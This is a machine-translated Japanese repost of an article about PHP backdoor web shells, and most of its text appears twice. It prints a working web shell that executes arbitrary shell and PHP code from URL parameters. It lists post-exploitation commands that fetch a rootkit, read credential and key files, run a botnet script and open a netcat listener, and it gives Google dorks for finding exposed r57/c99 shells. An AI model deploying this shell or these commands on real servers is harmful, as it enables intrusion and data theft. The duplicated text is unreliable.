バックドアの検索
4364 ワード
原文住所:http://resources.infosecinstitute.com/checking-out-backdoor-shells/
Web shellをアップロードする方法
1.ローカルファイルに脆弱性が含まれている-攻撃者はフォルダを介してプロパティを巡回することができる
2.リモートコマンド実行またはコマンド注入-Webサイトが追加の文字列を受信した場合、入力した文字列はWebサーバ上でコマンドを実行するパラメータとして使用されます.
3.SQLi-攻撃者アクティブウェブ管理者のusername/password後、管理権限を使用して管理パネルにアクセスし、バックドアをアップロードできます.
4. sniff
5.暴力解読-暴力解読FTP/SSHによるアクセス
6.クロスステーションスクリプト
7.社会工学
8.リモートファイルに含まれる
PHPバックドアについて説明します.
次のコードは、攻撃者実行*nixコマンドを実行します.
保存コードはbb.php、webサーバにアップロードします.末尾に追加する必要がありますか?shell=は、次のようなコマンドを実行します.
![[译]查找后门shell_第1张图片](https://s1.md5.ltd/image/116508eaa3386ed6ff6b2671518dc1d5.jpg)
![[译]查找后门shell_第2张图片](https://s1.md5.ltd/image/c605bc9a1bd10ea94230d13566f54e8e.jpg)
現在、開発者はバックドアshellに多くの特性を追加しています.例えば、r 57、c 99、およびAni-Shellバックドア.一部のバックドアにはメールボックスbombers、リターン、ファイルアップロード/ダウンロード、mysql dumper、sql文の実行、web fuzzer、ポートスキャンなどがあります.
![[译]查找后门shell_第3张图片](https://s1.md5.ltd/image/8b0eac96017c42589f17832989770f01.jpg)
![[译]查找后门shell_第4张图片](https://s1.md5.ltd/image/46e37dc75c646be2ad9a5a4e49c60a6e.jpg)
保護されていないバックドアはGoogle dorkで簡単に見つけることができます:inurl:r 57.php, intitle: MagicCoder | Version X70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.phpなど.
いくつかのバックドアは、PHPエンコーダを使用している攻撃者がいることを発見することができます.新しいPHPエンコーダはCarbylamineと呼ばれ、C 99とr 57が簡単に発見されないようにすることができます.Carbylamineは簡単です.
php carbylamine.php
Web shellをアップロードする方法
1.ローカルファイルに脆弱性が含まれている-攻撃者はフォルダを介してプロパティを巡回することができる
2.リモートコマンド実行またはコマンド注入-Webサイトが追加の文字列を受信した場合、入力した文字列はWebサーバ上でコマンドを実行するパラメータとして使用されます.
3.SQLi-攻撃者アクティブウェブ管理者のusername/password後、管理権限を使用して管理パネルにアクセスし、バックドアをアップロードできます.
4. sniff
5.暴力解読-暴力解読FTP/SSHによるアクセス
6.クロスステーションスクリプト
7.社会工学
8.リモートファイルに含まれる
PHPバックドアについて説明します.
次のコードは、攻撃者実行*nixコマンドを実行します.
<?php
if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>");
if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));
if(isset($_GET['echo'])) echo($_GET['echo']);
?>保存コードはbb.php、webサーバにアップロードします.末尾に追加する必要がありますか?shell=は、次のようなコマンドを実行します.
uname -a
cat /etc/issue
wget www.whateversite.com/rootkit.pl
cat /etc/passwd
cat /var/www/config.inc
find / -name netcat
ifconfig | grep eth0
perl botnet.pl
ls -la
ps aux | grep root
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat /proc/self/environ
find / -perm -1000 -type d 2>/dev/null
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
perl -v
python -v
ruby -v
gcc -v
nc -lvp 1337![[译]查找后门shell_第1张图片](https://img.md5.com/image/product/f10406a8cd3e4cc691d66ac2d23e2b7b.jpg)
![[译]查找后门shell_第2张图片](https://img.md5.com/image/product/9aff0a79918545a6bf1935765321a97f.jpg)
現在、開発者はバックドアshellに多くの特性を追加しています.例えば、r 57、c 99、およびAni-Shellバックドア.一部のバックドアにはメールボックスbombers、リターン、ファイルアップロード/ダウンロード、mysql dumper、sql文の実行、web fuzzer、ポートスキャンなどがあります.
![[译]查找后门shell_第3张图片](https://img.md5.com/image/product/7fb45deb2dec4c5ebe73fd78cf0bb420.jpg)
![[译]查找后门shell_第4张图片](https://img.md5.com/image/product/57a192376e684b0e969d5cf2f9e2c93d.jpg)
保護されていないバックドアはGoogle dorkで簡単に見つけることができます:inurl:r 57.php, intitle: MagicCoder | Version X70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.phpなど.
いくつかのバックドアは、PHPエンコーダを使用している攻撃者がいることを発見することができます.新しいPHPエンコーダはCarbylamineと呼ばれ、C 99とr 57が簡単に発見されないようにすることができます.Carbylamineは簡単です.
php carbylamine.php